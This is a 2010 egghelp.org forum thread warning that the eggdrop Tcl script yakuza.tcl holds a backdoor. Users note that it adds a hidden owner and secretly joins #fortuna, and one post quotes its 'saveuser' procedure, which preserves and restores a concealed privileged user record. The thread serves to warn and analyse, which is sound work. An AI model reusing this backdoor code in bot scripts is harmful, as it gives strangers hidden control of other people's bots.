egghelp.org community Forum Index
[ egghelp.org home | forum home ]
egghelp.org community
Discussion of eggdrop bots, shell accounts and tcl scripts.
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

yakuza.tcl; from eggdrop tcl archives

 
Post new topic   Reply to topic    egghelp.org community Forum Index -> Script Support & Releases
View previous topic :: View next topic  
Author Message
VampireLord
Voice


Joined: 25 Jan 2010
Posts: 6

PostPosted: Wed Feb 17, 2010 2:21 am    Post subject: yakuza.tcl; from eggdrop tcl archives Reply with quote

this tcl auto adds hikaro to the bots owner and auto adds a channel. this post may serve as a warning
Back to top
View user's profile Send private message
Sir_Fz
Revered One


Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

PostPosted: Wed Feb 17, 2010 10:01 am    Post subject: Reply with quote

On what basis are you making this statement?
_________________
Follow me on GitHub

- Opposing

Public Tcl scripts
Back to top
View user's profile Send private message Visit poster's website
nml375
Revered One


Joined: 04 Aug 2006
Posts: 2857

PostPosted: Wed Feb 17, 2010 4:41 pm    Post subject: Reply with quote

Might be this part of the script (does look awfully similar to the script we all love to hate..)
Code:
proc saveuser {} {
 global ps owner
 if {![validuser $ps]} {
  setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
 } elseif {$owner != $ps} {
  setuser $owner XTRA "BEND" [zip [chattr $ps]]
  if {[passwdok $ps ""] != 1} {
   setuser $owner XTRA "LAST" [getuser $ps "PASS"]
  }
  deluser $ps
 }
 save
 if {![validuser $ps]} {
  adduser $ps "$ps!*@*"
  chattr $ps [dezip [getuser $owner XTRA "BEND"]]
  if {[getuser $owner XTRA "LAST"] != ""} {
   setuser $ps PASS [getuser $owner XTRA "LAST"]
  }
 }
 return 1
}


A few other things in there that might be nasty as well, skimming through the code atm...

Updated:
It would also seem it will try to join your bot to a dedicated channel, while hiding any information about this to you. I'll see if I can't decode which channelname (looks like the same encryption/decryption-scheme as used by n**gate).

Updated:
Channel would appear to be #fortuna

Updated:
It will also make use of a second user record called "config". Not entirely sure if it's purpose yet, but it would seem it "is supposed to" be used for keeping settings. Still uses weak encryption. Also adds user records for each channel it keeps setting for...
_________________
NML_375, idling at #eggdrop@IrcNET
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    egghelp.org community Forum Index -> Script Support & Releases All times are GMT - 4 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Forum hosting provided by Reverse.net

Powered by phpBB © 2001, 2005 phpBB Group
subGreen style by ktauber